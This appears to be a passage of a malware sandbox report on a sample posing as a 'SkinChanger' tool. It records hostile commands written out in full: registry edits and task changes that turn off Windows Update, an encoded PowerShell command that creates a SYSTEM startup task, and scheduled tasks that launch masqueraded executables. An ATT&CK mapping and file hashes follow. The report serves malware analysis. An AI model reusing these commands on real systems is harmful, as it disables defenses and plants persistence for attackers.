reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4824

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2300

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2860

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:5496

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1012

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:888

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:2192

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:5116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5396

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4144

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:1864

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:3556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1360

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "fysugqofvxbu"
2⤵
PID:4120

C:\Windows\explorer.exe
C:\Windows\explorer.exe luvbvasixu0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/gWCF8syjnqONW8nAkIDCaiX6JyJkuCgTuOQv8CpGeKv1VALuliP/ha8Yjhtr6HMGk2rtUy+qneh6aJBuRE2Vl54snxeUp5YsY49VDdIyEysvbl9BsEUC35mC2kOBCmxC0JxCaQIXPdfkaqqK0slLenN1msO3trj6XDK8r1gefSJa5eSdUWn80xUbCsMx+vSBw/fgeBKOpIbO3PFsHY47GpDwiBS4J/sfvFzm9Z81e/R0fe5W8jG0UPs4d7gICDhbEElYG2jSwHbK0S6OPBDvA3oFTND9PNmzn3LH3zqfX+EJgpyL3wpnaD8+/S5pVbXlPPzIOFzSPhPY04QJRRPj7g==
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\Public\AccountPictures\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Users\Public\AccountPictures\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4512

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5716

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
83c4d165396a8d52c62d0f9a4687717c

SHA1
050a6b76f55e468e8868e31bbc91b54e94f3bc3e

SHA256
de384fc72d8814c341ab8b8e009679dafdbd3a7ef751f1a01199a1d984a42bde

SHA512
670c8812a1635ff4fed4c26ac0198cd905e74a8f8045217a77e0447acc62ca761586ad9cb93fd3e81533ebda88bccfcfac5dbce814f193901840e85558e13ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
17287c5a55c793bad93b4bec5afb064e

SHA1
f2428d36fdcc8e0ca659acf0035f86592a78287e

SHA256
908cd2b7887603817f1facaa67b738181c677eac335267b8dc8bdf4920c6baf9

SHA512
5af59213c9131f71d9f0f0905e5c61ac783690a1d3d21fbe2efc735727e705c4049ed65b0a12eb7dfc9d9db50723569f76d794ee118c0d2f814418e1b7d3229e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1db4985b6cb623684476eb7dac708b75

SHA1
fbd392eb602568ae5ad29a198cab10c7c94f1d7a

SHA256
e8a9339acbb81b2f93e25024329e3a1ce07b5e18360c8c21defd09661f3f35ae

SHA512
75746f9f3e75f44b39b17536e11c7873d24de50f1b7cfc25a3d599f2c87089580c1910595c1fadaeed405a1fc00d333821d3f5fb0accfda8c686186912895d86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
361b63c2f0ee7543622511a13919f301

SHA1
4302e43e3f46d2d8261e04e8302a684e6597a01e

SHA256
80cd39fb691b81cd236ef390ab58565f5a6f0e39a3a8646aae4558e2edc5045c

SHA512
ad37b0924740dbfcde3a34b7fccf6f5cd61918fd7da246df31bb5dfeed133130c43b84adcbebbe51a06027e3ad3adc19081cbd7036a05b476b6bfe34b9e87507

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
361b63c2f0ee7543622511a13919f301

SHA1
4302e43e3f46d2d8261e04e8302a684e6597a01e

SHA256
80cd39fb691b81cd236ef390ab58565f5a6f0e39a3a8646aae4558e2edc5045c

SHA512
ad37b0924740dbfcde3a34b7fccf6f5cd61918fd7da246df31bb5dfeed133130c43b84adcbebbe51a06027e3ad3adc19081cbd7036a05b476b6bfe34b9e87507

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0e26e4524b81ed86f7edb9883e860bc5

SHA1
6da83734fb2ab605223e11c2677074bdf3da486d

SHA256
511e7026cffce68f11fe595f684a343c11e1fc029f56e855644defd2dbbecd6b

SHA512
34b0d5606b8b4233d7f7fda3ce947331d0f062639ca998b7ea68e08d5117760e97b252473a0cafe49affb20abe78b0a107d920358d3a8942591d7c062045530f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5b151a4d0ca7db8be7b09b9a7d25675a

SHA1
767f625d094355560fe04ff3d83023dec5ddd88d

SHA256
20b7a59d6a69082a93a9e17000f883877f2931d598644838262c5d0d048d0701

SHA512
10955c1d11bb759a8e5ad1cf8921625a9d1908116c861da1c0ce80c60695614d30ee198587419dc71e9db803e3098a28985dd7fbce53650e4750a2884b732343

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4d19440ba70f1a58dcf511d7a5c52491

SHA1
b57a8508d7669216f837b34bd06265090c74701d

SHA256
80b2bfa351414c9304a2628221852a4df69a662d96979421d4e25f557c924ac6

SHA512
732686902c52737d16f21ec0e0533d8671867e022cf0f6140de49c24a0d9d0490ba95816a129bf1b54bef0abd3c1f30ad53340bd4d372a0b9ceaa512c063ddaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4d19440ba70f1a58dcf511d7a5c52491

SHA1
b57a8508d7669216f837b34bd06265090c74701d

SHA256
80b2bfa351414c9304a2628221852a4df69a662d96979421d4e25f557c924ac6

SHA512
732686902c52737d16f21ec0e0533d8671867e022cf0f6140de49c24a0d9d0490ba95816a129bf1b54bef0abd3c1f30ad53340bd4d372a0b9ceaa512c063ddaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b670cc658ef147794e833cc2131f9d5f

SHA1
dc58f4c06a903b3aee802a459e49b4c251cabe56

SHA256
3f62efca44ae627670f130d1f5e353df702ac243caf2f23d49e9b10e704479f2

SHA512
fd387777c61f05fa5562af74f0c54688609cb642faf7b46b2ff964c2a047d2fc790538f2b32191aef9975e51aeeb998248ce55710189e3236270a12f2f4ef0df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b670cc658ef147794e833cc2131f9d5f

SHA1
dc58f4c06a903b3aee802a459e49b4c251cabe56

SHA256
3f62efca44ae627670f130d1f5e353df702ac243caf2f23d49e9b10e704479f2

SHA512
fd387777c61f05fa5562af74f0c54688609cb642faf7b46b2ff964c2a047d2fc790538f2b32191aef9975e51aeeb998248ce55710189e3236270a12f2f4ef0df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c9621284cca9f762db0ee607c4848f0f

SHA1
5660947f7db370730c4e220688408eb98f8b1d85

SHA256
e7df8f301191062999352b91397648f9a390c8056d5f02fcb1a84da06ba9606e

SHA512
a383f212f78166cb84669c3450cdcc7b25b196ff36f7a7a687f0334644510699d58b8f7c09f9f75276565ca8bcecd8eb08c737c436068d0319355447d3bd98d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bebe7245d2d8ad8ae9da965d392d7ce6

SHA1
5cf498ed3ee849f36e39e4cba95e3fc29fb27dd2

SHA256
d7e6777d53a1e1aa15bbeba8299f00e19cadb94e44b6961d5b51eca8ef729e51

SHA512
441085dbb7cb115f825f46d8a17e3a11b7da676417de7c79c8b1bd0baaa9aeee5f77eb9ccf31a8384998a2930a9bdfa47ee58a1c562e17a4a04cb18145dd3a3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
85a445bc253f177fad9b031ffeceeffc

SHA1
11d32826fbdaf7d6e72ce5f5378b8437f4315266

SHA256
8a1ec6d83d53b66a9e36fd9cbb1f8228b1185fd6746934d3d2bd3336b060c4fa

SHA512
ca7f67923b726c4fc6f1f5f8804f8c091a81d628f5dde89aaf2183f743f7a13b2c51edb88505cb2fdd137523e2d3f8a23ba185ed4e5dfc496c86d70e2a1082a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f7bd6f61c13c19eab6a1511b591e8232

SHA1
7cfd472d13a024fb1fb0a5d2f80d94df3c56d9c0

SHA256
ef6df04a84a0f7334b712ffd5f8bfcb4255bb87fb163c291a302ea6ffd99089e

SHA512
2f2a9e2edee60eb522df77e2efa501944200cd16aa538ad1e3b1536ec75ebb8f1b6811c1beed6fb29c8be1764d634700a48d4e2d014e249adbabac61e5b1deb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f7bd6f61c13c19eab6a1511b591e8232

SHA1
7cfd472d13a024fb1fb0a5d2f80d94df3c56d9c0

SHA256
ef6df04a84a0f7334b712ffd5f8bfcb4255bb87fb163c291a302ea6ffd99089e

SHA512
2f2a9e2edee60eb522df77e2efa501944200cd16aa538ad1e3b1536ec75ebb8f1b6811c1beed6fb29c8be1764d634700a48d4e2d014e249adbabac61e5b1deb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6d135faa55a59c99a540fe566930abf3

SHA1
9986442598d39c2cafbf08c7e1ca539575965e54

SHA256
54c77f10cc5099c46b7294686fa8a825fd0150a26a64913b3016ba8ff17fdfb2

SHA512
14cfdd673c7ace0d26076e7a79df0b5b6be06ad9c53d0648058dc6122b6f68cec9be8ddfdd693c65dfe23b656802b246ca68d724c24fe808ce5b4bf5f8fcac68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7f2f1b2d6d9fc6053d168af6610783a9

SHA1
58362b25978e1fa6d494ed4a3d4c012360bf8da6

SHA256
bb994ca3c52565bd84a3d2a88d59388359098ad3e2142f09a7eef56f495b6624

SHA512
cb64a4198a4ed9ff298c9289c2618b2041f9d17e2deb8665c971616ac9900391e1e4c350dbaf834a70f3241c4919d6e2b604240bdb3b54113b210ee00e8cb3a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe
Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe
Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe
Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe
Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6f2030ac-db5a-414d-929b-196439ee9a04.vbs
Filesize
716B

MD5
005a16fb0e585a575e58aa7f575e912c

SHA1
c5568eec3397e3d34c3258ba9fa2aaef18f16557

SHA256
2553189a0770bb4cacd04e2da91d2cd235fe9328dfa9dc1ce7431f3e10fdf96d

SHA512
8584f01f2674a2e4cd1b6ee7d7c615f12d1d1dcaeedef4f757537817f5f6ce0712cdd7270d6433def00e5c9a27c5b2083c2d256a9be84cbd69ccc3ca466c525f

Download Submit
C:\Users\Admin\AppData\Local\Temp\E2FgvhS1mJ.bat
Filesize
205B

MD5
0d9178585dbdabd86a1c55b76ae9c4d2

SHA1
8bb32b6fd1a861da63fcc231c54c0abc7521dc1b

SHA256
9845b7d1b9850465f5e390fe95dde2a068ccfb56c20c5bd6edf8f4f027f8f58c

SHA512
6a8224a7de60bce99cde4174874e5154a0465b929557d34030f0d562c5da632c6d6e17c0cf23a10ee7bee200e6478fa7e85616239ba115aa487466e6c579a258

Download Submit
C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\SkinChanger.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\d41e02de-fb9b-4935-b407-56b01f0d829d.vbs
Filesize
492B

MD5
3fbd98a6dbcf1f80c2227468bf9817fa

SHA1
2c307bfb65e97b23400b6aff34c1bc82b36b2c5a

SHA256
5eca80f52b1fe1f02cb63532da7805dec601df891efec1d236c5bea26f265825

SHA512
547e57af3b99503ed247e156b1f856c701bf41fbc8c5ab3fac12f152ab0574128d49f31140c370a1cf84e74ae170cd040b43a3bd3b73f0361f596a39f5beac19

Download Submit
C:\Users\Public\AccountPictures\Idle.exe
Filesize
2.7MB

MD5
46bf9bb251265bc3b19ce6f4c6580dfc

SHA1
89dd637c3c8c31a3514eb543dab20a7011f77495

SHA256
a70549b04f556bbbfe8e03618f15ae7e5bba3b952161db3e780b28618e9a4eb1

SHA512
af455180d30461f9d9ae6543810e031450bb808458d67ade4b764d23507d3d49820be0105e714adbcf3f3b476efd25fea435d2acc8168a28e4de9161e18ebad9

Download Submit
C:\Users\Public\AccountPictures\Idle.exe
Filesize
2.7MB

MD5
46bf9bb251265bc3b19ce6f4c6580dfc

SHA1
89dd637c3c8c31a3514eb543dab20a7011f77495

SHA256
a70549b04f556bbbfe8e03618f15ae7e5bba3b952161db3e780b28618e9a4eb1

SHA512
af455180d30461f9d9ae6543810e031450bb808458d67ade4b764d23507d3d49820be0105e714adbcf3f3b476efd25fea435d2acc8168a28e4de9161e18ebad9

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
15KB

MD5
5f5aa607657efd596f2ba27625bb7ed4

SHA1
6818e799afcb486fa9416eb29468c10f7a051d88

SHA256
f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b

SHA512
0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
9e97fb2695d962c6323739e02ad343b8

SHA1
f8678637e6e0b049990515fe5b86d7e1c899c64c

SHA256
aa28ac9b1e05ad85bc79a9a75157240ac15b9c16d6e66404b981a299cfcfa6e2

SHA512
373a98b305140a42e99e7f5c0862ef83dd1b2d2546b6d9e64dfa82bb0efc8609f4a36b8cb9e0f52be8b4e76ee4a23586a8042a67eb888285a8045dcbd1f0baaf

Download Submit
C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe
Filesize
216B

MD5
83c65c5fb5d6cae5d1a56338d81546d8

SHA1
da674eea76da502aeba2c0a63d551dc9d243c561

SHA256
c4010b41b3ee553d967decf86d7856464f9ae29bfd5334cd602f24cd14424783

SHA512
0d5b0b94d8ec8d53539044ab5805547c12cbe4ca87d0c74e5b768f1904794a820a3fd5e662dc16d0232c60efc1491c79731975f55b2da12139d70e4ef8d1f9b6

Download Submit
C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat
Filesize
42B

MD5
44d17cedd450404d8c00269b1524e8b3

SHA1
a220bcaa6f9116982f01d96ed0cf8e8e71a731c5

SHA256
353034b198126f85e5c8cfbdd287d525cbd2abd3c827260cca2d1d54ab372d46

SHA512
e1dd54671bcd0d0b97b11fd74447ff07978efbafee4d35d68bdef94e35078e0f84f6c1be63f1e976d0729da9f21829afc22dd76aa5a84a31d7270b60d53b2c5d

Download Submit
C:\comsavesbroker\containersavesdhcp.exe
Filesize
2.7MB

